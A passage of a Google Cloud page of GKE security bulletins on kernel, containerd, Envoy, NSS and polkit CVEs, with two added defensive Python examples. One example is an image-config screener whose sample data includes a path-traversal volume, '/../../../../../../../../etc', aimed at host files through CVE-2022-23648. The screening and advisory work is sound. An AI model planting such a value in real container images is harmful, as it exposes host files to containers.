2022-05-12 Update: Updated patch versions for GKE on AWS and
GKE on Azure.
Reference: CVE-2022-1055, CVE-2022-27666
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: GKE Autopilot clusters and workloads running in GKE Sandbox are unaffected by these vulnerabilities. Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666, have been discovered in the Linux kernel. Each can let a local attacker perform a container breakout, escalate privileges on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical details: In CVE-2022-1055, a use-after-free in tc_new_tfilter() allows a local attacker in a container to escalate privileges to root on the node. In CVE-2022-27666, a buffer overflow in esp/esp6_output_head allows a local attacker in a container to escalate privileges to root on the node. What should I do? The Linux node images in the following GKE versions have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following upcoming GKE versions:
What vulnerabilities are addressed by this patch? |
High |
GKE on VMware
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666, have been discovered in the Linux kernel. Each can let a local attacker perform a container breakout, escalate privileges on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical details: In CVE-2022-1055, a use-after-free in tc_new_tfilter() allows a local attacker in a container to escalate privileges to root on the node. In CVE-2022-27666, a buffer overflow in esp/esp6_output_head allows a local attacker in a container to escalate privileges to root on the node. What should I do? Upgrade your cluster to a patched version. The following GKE on VMware versions or newer contain the fix for these vulnerabilities:
What vulnerabilities are addressed by this patch? |
High |
GKE on AWS
Updated: 2022-05-12
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666, have been discovered in the Linux kernel. Each can let a local attacker perform a container breakout, escalate privileges on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical details: In CVE-2022-1055, a use-after-free in tc_new_tfilter() allows a local attacker in a container to escalate privileges to root on the node. In CVE-2022-27666, a buffer overflow in esp/esp6_output_head allows a local attacker in a container to escalate privileges to root on the node. What should I do? 2022-05-12 Update: The following current and previous generation versions of GKE on AWS have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on AWS versions: Current generation
Upgrade your cluster to a patched version. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerabilities are addressed by this patch? |
High |
GKE on Azure
Updated: 2022-05-12
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666, have been discovered in the Linux kernel. Each can let a local attacker perform a container breakout, escalate privileges on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical details: In CVE-2022-1055, a use-after-free in tc_new_tfilter() allows a local attacker in a container to escalate privileges to root on the node. In CVE-2022-27666, a buffer overflow in esp/esp6_output_head allows a local attacker in a container to escalate privileges to root on the node. What should I do? 2022-05-12 Update: The following versions of GKE on Azure have been updated with code to fix these vulnerabilities. We recommend that you upgrade your nodes to one of the following GKE on Azure versions:
Upgrade your cluster to a patched version. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerabilities are addressed by this patch? |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
Two security vulnerabilities, CVE-2022-1055 and CVE-2022-27666, have been discovered in the Linux kernel. Each can let a local attacker perform a container breakout, escalate privileges on the host, or both. These vulnerabilities affect all GKE node operating systems (Container-Optimized OS and Ubuntu). Technical details: In CVE-2022-1055, a use-after-free in tc_new_tfilter() allows a local attacker in a container to escalate privileges to root on the node. In CVE-2022-27666, a buffer overflow in esp/esp6_output_head allows a local attacker in a container to escalate privileges to root on the node. What should I do? There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by these CVEs because it does not include Linux as part of its package. You should ensure that the node images you use are updated to versions that contain the fixes for CVE-2022-1055 and CVE-2022-27666. What vulnerabilities are addressed by this patch? |
High |
GCP-2022-013
Published: 2022-04-11
Updated: 2022-04-20
Reference: CVE-2022-23648
2022-04-22 Update: Updated patch versions for Google Distributed Cloud Virtual for Bare Metal and GKE on VMware.
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). This vulnerability affects all GKE node operating systems (Container-Optimized OS and Ubuntu), which use containerd by default. All GKE, Autopilot, and GKE Sandbox nodes are affected. What should I do? The Linux node images in the following GKE versions have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your nodes to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. |
Medium |
GKE on VMware
Updated: 2022-04-22
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). This vulnerability affects all GKE on VMware clusters with Stackdriver enabled, which use containerd. GKE on VMware versions 1.8, 1.9, and 1.10 are affected. What should I do? 2022-04-22 Update: The following versions of GKE on VMware contain code that fixes this vulnerability.
The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on VMware versions:
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). All GKE on AWS versions are affected. What should I do? The following versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions. GKE on AWS (current generation)
GKE on AWS (previous generation)
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
GKE on Azure
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). All GKE on Azure versions are affected. What should I do? The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes as follows:
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
Google Distributed Cloud Virtual for Bare Metal
Updated: 2022-04-22
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). This vulnerability affects all Google Distributed Cloud Virtual for Bare Metal clusters, which use containerd. Google Distributed Cloud Virtual for Bare Metal versions 1.8, 1.9, and 1.10 are affected. What should I do? 2022-04-22 Update: The following versions of Google Distributed Cloud Virtual for Bare Metal contain code that fixes this vulnerability.
The following versions of Google Distributed Cloud Virtual for Bare Metal have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following Google Distributed Cloud Virtual for Bare Metal versions:
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
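CVE-2022-23648 (bulletin GCP-2022-013 above) is triggered by the image itself: the image config's `Volumes` map (what a Dockerfile `VOLUME` line produces) can carry a path that climbs out of the container root, and containerd's CRI plugin mounted it without confining it. Upgrading containerd is the fix, and the bulletin notes `IgnoreImageDefinedVolumes` as a mitigation. The following added example, which is not part of the bulletin page and not containerd's own code, is a pre-admission screen a practitioner could run over image configs pulled from a registry: it lists image-defined volumes and flags any that contain a `..` component or whose lexical join onto a container rootfs would land outside it. The sample image config and the rootfs path are constructed for the example.

```python
from __future__ import annotations

import json
import posixpath

# Constructed OCI image config (the JSON the manifest's "config" descriptor
# points at, as `crane config IMAGE` prints it). Only the third volume is
# hostile: it climbs out of the container root with "..".
SAMPLE_IMAGE_CONFIG = json.dumps({
    "architecture": "amd64",
    "os": "linux",
    "config": {
        "Volumes": {
            "/data": {},
            "/var/lib/app": {},
            "/../../../../../../../../etc": {},
        }
    },
})

# Hypothetical container rootfs; only its depth matters for the lexical check.
EXAMPLE_ROOTFS = "/run/containerd/io.containerd.runtime.v2.task/k8s.io/example/rootfs"


def image_defined_volumes(image_config_json: str) -> list[str]:
    """Return the image-defined volume paths (Dockerfile VOLUME / config.Volumes)."""
    cfg = json.loads(image_config_json)
    return list((cfg.get("config") or {}).get("Volumes") or {})


def escapes_rootfs(volume_path: str, rootfs: str = EXAMPLE_ROOTFS) -> bool:
    """True if joining the volume path onto rootfs and normalising it lexically
    lands outside rootfs. This is a static approximation: it cannot see symlinks
    inside the image, so it is a screening check, not proof of safety."""
    joined = posixpath.normpath(posixpath.join(rootfs, volume_path.lstrip("/")))
    return not (joined == rootfs or joined.startswith(rootfs + "/"))


def suspicious_volumes(image_config_json: str) -> dict[str, list[str]]:
    """Map each image-defined volume that looks unsafe to the reasons it was flagged."""
    findings: dict[str, list[str]] = {}
    for vol in image_defined_volumes(image_config_json):
        reasons = []
        if not vol.startswith("/"):
            reasons.append("not an absolute path")
        if ".." in vol.split("/"):
            reasons.append("contains a '..' component")
        if escapes_rootfs(vol):
            reasons.append("lexical join resolves outside the container rootfs")
        if reasons:
            findings[vol] = reasons
    return findings


if __name__ == "__main__":
    # Real use: crane config IMAGE | python3 this_script.py
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_IMAGE_CONFIG
    for vol, why in suspicious_volumes(data).items():
        print(f"{vol}: {'; '.join(why)}")
```

The check is deliberately conservative: any `..` component is reported even when it would not leave the rootfs, because there is no legitimate reason for an image to declare such a volume. On nodes you administer yourself, the containerd side of the bulletin's mitigation is the `ignore_image_defined_volumes = true` setting of the CRI plugin in `config.toml`, which makes the runtime skip `config.Volumes` entirely; on GKE-managed nodes the patched node image is the fix.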
GCP-2022-012
Published: 2022-04-07
Updated: 2022-11-22
Reference: CVE-2022-0847
2022-11-22 Update: Updated information about workloads using GKE Sandbox.
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: Workloads using GKE Sandbox are not affected by this vulnerability. A security vulnerability, CVE-2022-0847, has been discovered in Linux kernel version 5.8 and later that can potentially escalate container privileges to root. This vulnerability affects all GKE node pool versions v1.22 and later that use Container-Optimized OS images (Container-Optimized OS 93 and later). GKE node pools that use the Ubuntu OS are not affected. What should I do? The Linux node images in the following GKE versions have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent release channels feature allows you to apply a patch version from another release channel without unsubscribing from your channel. This lets you secure your nodes until the new version becomes the default for your release channel. What vulnerabilities are addressed by this patch? CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag introduced in version 5.8 of the Linux kernel: the "flags" member of a newly allocated pipe buffer structure was not properly initialized. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read-only files and escalate their privileges. New versions of Container-Optimized OS that fix this issue have been integrated into the updated node pool versions of GKE. |
High |
GKE on VMware
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in Linux kernel version 5.8 and later that can potentially escalate privileges to root. This vulnerability affects GKE on VMware v1.10 for Container-Optimized OS images. Currently, GKE on VMware with Ubuntu is on kernel version 5.4 and is not vulnerable to this attack. What should I do? The Linux node images in the following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to the following GKE on VMware version:
What vulnerabilities are addressed by this patch? CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag introduced in version 5.8 of the Linux kernel: the "flags" member of a newly allocated pipe buffer structure was not properly initialized. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read-only files and escalate their privileges. New versions of Container-Optimized OS that fix this issue have been integrated into the updated versions of GKE on VMware. |
High |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in Linux kernel version 5.8 and later that can potentially escalate privileges to root. This vulnerability affects managed clusters of GKE on AWS v1.21 and clusters running on GKE on AWS (previous generation) v1.19, v1.20, and v1.21, which use Ubuntu. What should I do? The Linux node images in the following versions of GKE on AWS have been updated with code to fix this vulnerability. For managed GKE on AWS, we recommend that you upgrade your user clusters and node pools to one of the following versions:
For k-lite GKE on AWS, we recommend that you upgrade your AWSManagementService, AWSCluster and AWSNodePool objects to the following version:
What vulnerabilities are addressed by this patch? CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag introduced in version 5.8 of the Linux kernel: the "flags" member of a newly allocated pipe buffer structure was not properly initialized. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read-only files and escalate their privileges. |
High |
GKE on Azure
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in Linux kernel version 5.8 and later that can potentially escalate privileges to root. This vulnerability affects managed clusters of GKE on Azure v1.21, which use Ubuntu. What should I do? The Linux node images in the following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your user clusters and node pools to the following version:
What vulnerabilities are addressed by this patch? CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag introduced in version 5.8 of the Linux kernel: the "flags" member of a newly allocated pipe buffer structure was not properly initialized. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read-only files and escalate their privileges. |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in Linux kernel version 5.8 and later that can potentially escalate privileges to root. What should I do? There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE because it does not include Linux as part of its package. You should ensure that the node images you use are updated to versions that contain the fix for CVE-2022-0847. |
High |
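The kernel bulletins above (GCP-2022-018, GCP-2022-017, GCP-2022-016 and GCP-2022-012) each scope the affected nodes by node image and kernel series, and several exempt workloads in GKE Sandbox. The following added example, which is not part of the bulletin page and not a Google tool, triages a cluster's node inventory against those scopes using the fields `kubectl get nodes -o json` already reports. The scopes encode the GKE rows of each bulletin (the multi-cloud rows differ for Ubuntu). It answers only "is this node in scope?"; whether the node pool already runs a patched GKE version must be checked against the version lists in each bulletin, which this page does not reproduce. The node records are constructed, and the `sandbox.gke.io/runtime` label is the one GKE Sandbox node pools carry.

```python
from __future__ import annotations

import json
import re

# Constructed sample of `kubectl get nodes -o json`, trimmed to the fields this
# check reads. Node names are made up; the osImage/kernelVersion strings follow
# the formats that COS ("5.10.90+") and Ubuntu ("5.4.0-1068-gke") nodes report.
SAMPLE_NODES_JSON = json.dumps({"items": [
    {"metadata": {"name": "gke-pool-a-cos-510", "labels": {}},
     "status": {"nodeInfo": {"osImage": "Container-Optimized OS from Google",
                             "kernelVersion": "5.10.90+"}}},
    {"metadata": {"name": "gke-pool-b-ubuntu-54", "labels": {}},
     "status": {"nodeInfo": {"osImage": "Ubuntu 20.04.4 LTS",
                             "kernelVersion": "5.4.0-1068-gke"}}},
    {"metadata": {"name": "gke-pool-c-cos-54", "labels": {}},
     "status": {"nodeInfo": {"osImage": "Container-Optimized OS from Google",
                             "kernelVersion": "5.4.170+"}}},
    {"metadata": {"name": "gke-pool-d-sandbox-cos-510",
                  "labels": {"sandbox.gke.io/runtime": "gvisor"}},
     "status": {"nodeInfo": {"osImage": "Container-Optimized OS from Google",
                             "kernelVersion": "5.10.90+"}}},
]})

# Affected-node scope of each bulletin's GKE row, as stated in the bulletin text:
# predicate over (is_cos, is_ubuntu, (kernel major, kernel minor)).
BULLETINS = {
    "GCP-2022-018 CVE-2022-2327": lambda cos, ubu, kv: cos and kv == (5, 10),
    "GCP-2022-017 CVE-2022-1786": lambda cos, ubu, kv: cos and kv in ((5, 10), (5, 11)),
    "GCP-2022-016 CVE-2022-29581/29582/1116": lambda cos, ubu, kv: cos or ubu,
    "GCP-2022-012 CVE-2022-0847": lambda cos, ubu, kv: cos and kv >= (5, 8),
}

SANDBOX_LABEL = "sandbox.gke.io/runtime"  # label on GKE Sandbox node pools


def kernel_major_minor(kernel_version: str) -> tuple[int, int]:
    """'5.10.90+' -> (5, 10); '5.4.0-1068-gke' -> (5, 4)."""
    m = re.match(r"(\d+)\.(\d+)", kernel_version)
    if m is None:
        raise ValueError(f"unrecognised kernel version: {kernel_version!r}")
    return int(m.group(1)), int(m.group(2))


def triage_nodes(nodes_json: str) -> dict[str, dict]:
    """Map each node to the bulletins whose affected scope it falls in.

    This is a scope check, not a patch-level check: confirm the node pool
    version against the fixed versions listed in each bulletin separately.
    """
    report: dict[str, dict] = {}
    for item in json.loads(nodes_json)["items"]:
        info = item["status"]["nodeInfo"]
        os_image = info["osImage"]
        is_cos = os_image.startswith("Container-Optimized OS")
        is_ubuntu = os_image.startswith("Ubuntu")
        kv = kernel_major_minor(info["kernelVersion"])
        in_scope = [b for b, affected in BULLETINS.items() if affected(is_cos, is_ubuntu, kv)]
        sandboxed = item["metadata"].get("labels", {}).get(SANDBOX_LABEL) == "gvisor"
        report[item["metadata"]["name"]] = {
            "os": "cos" if is_cos else "ubuntu" if is_ubuntu else "other",
            "kernel": kv,
            "in_scope": in_scope,
            # The bulletins state that workloads in GKE Sandbox are not affected;
            # the node's own kernel still needs the upgrade.
            "sandbox_workloads_exempt": sandboxed,
        }
    return report


if __name__ == "__main__":
    # Real use: kubectl get nodes -o json | python3 this_script.py
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NODES_JSON
    for node, r in triage_nodes(data).items():
        scope = ", ".join(r["in_scope"]) or "none"
        exempt = " (sandbox workloads exempt)" if r["sandbox_workloads_exempt"] else ""
        print(f"{node}: {r['os']} {r['kernel'][0]}.{r['kernel'][1]} -> {scope}{exempt}")
```

Once a node pool is confirmed in scope, the "apply a patch without unsubscribing from a channel" path the bulletins mention is an explicit node pool upgrade with `gcloud container clusters upgrade CLUSTER --node-pool POOL --cluster-version VERSION`, where VERSION is one of the patched versions listed in the bulletin and valid for the cluster's channel (`gcloud container get-server-config` lists them).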
GCP-2022-011
Published: 2022-03-22
Updated: 2022-08-11
2022-08-11 Update: Added more details about the effects of the SMT misconfiguration.
GKE
Description | Severity |
---|---|
Update 2022-08-11: Added more information about the Simultaneous Multi-Threading (SMT) configuration. SMT was intended to be disabled, but was enabled on the versions listed. If you manually enabled SMT for a sandboxed node pool, SMT will remain manually enabled despite this issue.
There is a misconfiguration with Simultaneous Multi-Threading (SMT), also known as Hyper-Threading, on GKE Sandbox images. The misconfiguration leaves nodes potentially exposed to side-channel attacks such as Microarchitectural Data Sampling (MDS) (for more context, see the GKE Sandbox documentation). We do not recommend using the following affected versions:
If you manually enabled SMT for a node pool, then this issue does not affect your sandboxed nodes.
What should I do?
Upgrade your nodes to one of the following versions:
What vulnerability is addressed by this patch?
GKE Sandbox nodes have SMT disabled by default, mitigating side-channel attacks. |
Medium |
GCP-2022-009
Published: 2022-03-01
Updated: 2022-03-15
GKE
Description | Severity |
---|---|
Update 2022-03-15: Added hardening guides for GKE on AWS and GKE on Azure. Added a section on persistence using webhooks.
Some unexpected paths to access the node VM on GKE Autopilot clusters could have been used to escalate privileges in the cluster. These issues have been fixed and no further action is required. The fixes address issues reported through our Vulnerability Reward Program. GKE Standard and GKE cluster users can optionally apply a similar hardening policy as described below.
Technical details
Host access using third-party policy exemptions
In order to allow Google Cloud to offer full management of nodes, and a Pod-level SLA, GKE Autopilot restricts some highly privileged Kubernetes primitives to limit workloads from having low-level access to the node VM. To set this in context: GKE Standard presents full access to the underlying compute, Autopilot presents limited access, and Cloud Run presents no access. Autopilot relaxes some of those restrictions for a predefined list of third-party tools to allow customers to run those tools on Autopilot without modification. Using privileges to create pods with host path mounts, the researcher was able to run a privileged container in a pod that looked like one of these allowlisted third-party tools to gain access to the host. The ability to schedule pods in this way is expected on GKE Standard, but not on GKE Autopilot, as it bypassed the host-access restrictions used to enable the SLA described previously. This issue was fixed by tightening the third-party allowlisting pod specification.
Privilege escalation from root-on-node
In addition to the host access, the
We have deprecated and removed the
As a system hardening measure to prevent this type of attack in the future, we'll apply an Autopilot constraint in an upcoming release that prevents updates to the service account of various objects in the
Addition 2022-03-15: Persistence using mutating webhooks
Mutating webhooks were used in the report to establish a privileged foothold in the cluster post-compromise. These are standard parts of the Kubernetes API created by cluster admins, and were made visible to administrators when Autopilot added support for customer-defined webhooks.
Privileged service accounts in the default namespace
Autopilot policy enforcers previously allowlisted two service accounts in the default namespace:
What should I do?
All GKE Autopilot clusters have had their policies updated to remove the unintended host access and no further action is required. Further policy hardening will be applied to Autopilot in the coming weeks as a secondary protection. No action is required for GKE Standard clusters and GKE clusters, which are unaffected as users already have access to the host. As a system hardening measure, GKE Standard and GKE cluster users can apply similar protection with a Gatekeeper policy that prevents privileged workload self-modification. For instructions, refer to the following hardening guides:
|
Low |
GCP-2022-008
Published: 2022-02-23
Updated: 2022-04-28
Reference:
CVE-2022-23606,
CVE-2022-21655,
CVE-2021-43826,
CVE-2021-43825,
CVE-2021-43824,
CVE-2022-21654,
CVE-2022-21657,
CVE-2022-21656
GKE
Description | Severity |
---|---|
The Envoy project recently discovered a set of vulnerabilities, CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656, which may impact GKE clusters using Anthos Service Mesh, Istio-on-GKE, or custom Istio deployments. All issues listed below are fixed in Envoy release 1.21.1.
Technical Background
Additional details for these vulnerabilities are available here.
What should I do?
GKE clusters running Anthos Service Mesh should upgrade to a supported version with fixes for the above vulnerabilities.
GKE clusters running Istio-on-GKE should upgrade to a supported version with fixes for the above vulnerabilities.
What vulnerabilities are addressed by this patch?
CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656 |
High |
GKE on VMware
Updated: 2022-04-28
Description | Severity |
---|---|
Envoy recently released multiple security vulnerability fixes. GKE on VMware is impacted because Envoy is used with metrics-server. The Envoy CVEs we are fixing are listed below. We will update this bulletin with specific versions when they're available:
Istio recently released one security vulnerability fix. Anthos on VMware is impacted because Istio is used for ingress. The Istio CVEs we are fixing are listed below. We will update this bulletin with specific versions when they're available:
CVE-2022-23635 (CVSS score 7.5, High): Istiod crashes upon receiving requests with a specially crafted `authorization` header.
For the full descriptions and impacts of the above CVEs, please refer to the security bulletins.
2022-04-28 Addition:
What should I do?
The following versions of GKE on VMware fix these vulnerabilities:
What vulnerabilities are addressed by this patch?
CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656 |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
Envoy recently released multiple security vulnerability fixes. Anthos on Bare Metal is impacted because Envoy is used for metrics-server. The Envoy CVEs we are fixing in releases 1.10.3, 1.9.6, and 1.8.9 are listed below:
For the full descriptions and impacts of the above CVEs, please refer to the security bulletins.
What vulnerabilities are addressed by this patch?
CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656 |
High |
GCP-2022-006
Published: 2022-02-14
Updated: 2022-05-16
2022-05-16 Update: Added GKE version 1.19.16-gke.7800 or later to the list of versions that have code to fix this vulnerability.
2022-05-12 Update: Updated patch versions for GKE, Google Distributed Cloud Virtual for Bare Metal, GKE on VMware, and GKE on AWS. Fixed an issue where the security bulletin for GKE on AWS was not displayed when it was added on 2022-02-23.
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492, has been discovered in the Linux kernel's
What should I do?
2022-05-16 Update: In addition to the GKE versions mentioned in the 2022-05-12 update, GKE version 1.19.16-gke.7800 or later also contains code that fixes this vulnerability.
2022-05-12 Update: The following versions of GKE contain code that fixes this vulnerability:
Update 2022-02-15: Corrected gVisor statement.
The vulnerability is found in the Linux kernel's
Patches will be available in an upcoming release. This bulletin will be updated when they are available.
What vulnerability is addressed by this patch?
CVE-2022-0492 |
Low |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492, has been discovered in the Linux kernel's
What should I do?
2022-05-12 Update: The following versions of GKE on VMware contain code that fixes this vulnerability.
COS
The vulnerability is found in the Linux kernel's cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c and can be used as a container breakout. GKE on VMware clusters are unaffected due to protection from the default AppArmor profile on Ubuntu and COS. However, some customers may still be vulnerable if they have loosened security restrictions on pods through modification of the Pod or container securityContext field, e.g. by disabling or changing the AppArmor profile, which is not recommended. Patches will be available in an upcoming release. This bulletin will be updated when they are available.
What vulnerability is addressed by this patch?
CVE-2022-0492 |
Low |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492, has been discovered in the Linux kernel's
What should I do?
2022-05-12 Update: The following versions of current and previous generation GKE on AWS contain code that fixes this vulnerability:
Current generation
Update 2022-02-23: Added note for GKE on AWS.
GKE on AWS previous and current generations are unaffected due to protection from the default AppArmor profile on Ubuntu. However, some customers may still be vulnerable if they have loosened security restrictions on pods through modification of the Pod or container securityContext field, e.g. by disabling or changing the AppArmor profile, which is not recommended. Patches will be available in an upcoming release. This bulletin will be updated when they are available.
What vulnerability is addressed by this patch?
CVE-2022-0492 |
Low |
GKE Enterprise on
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492, has been discovered in the Linux kernel's
What should I do?
2022-05-12 Update: The following versions of GKE on Azure contain code that fixes this vulnerability:
GKE on Azure clusters are unaffected due to protection from the default AppArmor profile on Ubuntu. However, some customers may still be vulnerable if they have loosened security restrictions on pods through modification of the Pod or container securityContext field, e.g. by disabling or changing the AppArmor profile, which is not recommended. Patches will be available in an upcoming release. This bulletin will be updated when they are available.
What vulnerability is addressed by this patch?
CVE-2022-0492 |
Low |
GCP-2022-005
Published: 2022-02-11
Updated: 2022-02-15
Reference: CVE-2021-43527
GKE
Description | Severity |
---|---|
Update 2022-02-15: Some GKE versions mentioned in the original bulletin were combined with other fixes and had their version numbers incremented prior to release. Patches are available in the following GKE versions:
A security vulnerability, CVE-2021-43527, has been discovered in any binary that links to the vulnerable versions of libnss3 found in NSS (Network Security Services) versions prior to 3.73 or 3.68.1. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how NSS is used and configured. Both GKE COS and Ubuntu images have a vulnerable version installed, and need to be patched. Potentially, CVE-2021-43527 can have a wide impact across applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS#7, or PKCS#12. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may also be impacted. Impact depends on how NSS is used and configured. GKE doesn't use libnss3 for any Internet-accessible APIs. The impact is limited to on-host code running outside containers, which is small due to the minimal design of Chrome OS. GKE code running inside containers using the golang distroless base image is unaffected.
What should I do?
The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your control plane and nodes to one of the following GKE versions:
What vulnerability is addressed by this patch? |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-43527, has been discovered in any binary that links to the vulnerable versions of libnss3 found in NSS (Network Security Services) versions prior to 3.73 or 3.68.1. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. Both GKE on VMware COS and Ubuntu images have a vulnerable version installed, and need to be patched. Potentially, CVE-2021-43527 can have a wide impact across applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS#7, or PKCS#12. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may also be impacted. Impact depends on how they configure and use NSS. Anthos on VMware doesn't use libnss3 for any publicly accessible APIs, therefore the impact is limited and this CVE's severity for GKE on VMware is rated as Medium.
What should I do?
The versions of Linux node images for the following versions of Anthos have been updated with code to fix these vulnerabilities. Upgrade your control plane and nodes to one of the following Anthos versions:
Are you using a GKE on VMware version older than 1.18? You are using an Anthos version out of SLA and should consider upgrading to one of the supported versions.
What vulnerability is addressed by this patch? |
Medium |
GKE Enterprise on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-43527, has been discovered in any binary that links to the vulnerable versions of libnss3 found in NSS (Network Security Services) versions prior to 3.73 or 3.68.1. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how NSS is used and configured. Anthos clusters on Azure Ubuntu images have a vulnerable version installed, and need to be patched. Potentially, CVE-2021-43527 can have a wide impact across applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS#7, or PKCS#12. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may also be impacted. Impact depends on how they configure and use NSS. Anthos clusters on Azure doesn't use libnss3 for any publicly accessible APIs, therefore the impact is limited and this CVE's severity for Anthos on Azure is rated as Medium.
What should I do?
The versions of Linux node images for the following versions of GKE on Azure have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following Anthos on Azure versions:
What vulnerability is addressed by this patch? |
Medium |
GCP-2022-004
Published: 2022-02-04
Reference: CVE-2021-4034
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2021-4034, has been discovered in pkexec, a part of the Linux policy kit package (polkit), that allows an authenticated user to perform a privilege escalation attack. PolicyKit is generally used only on Linux desktop systems to allow non-root users to perform actions such as rebooting the system, installing packages, restarting services etc., as governed by a policy.
What should I do?
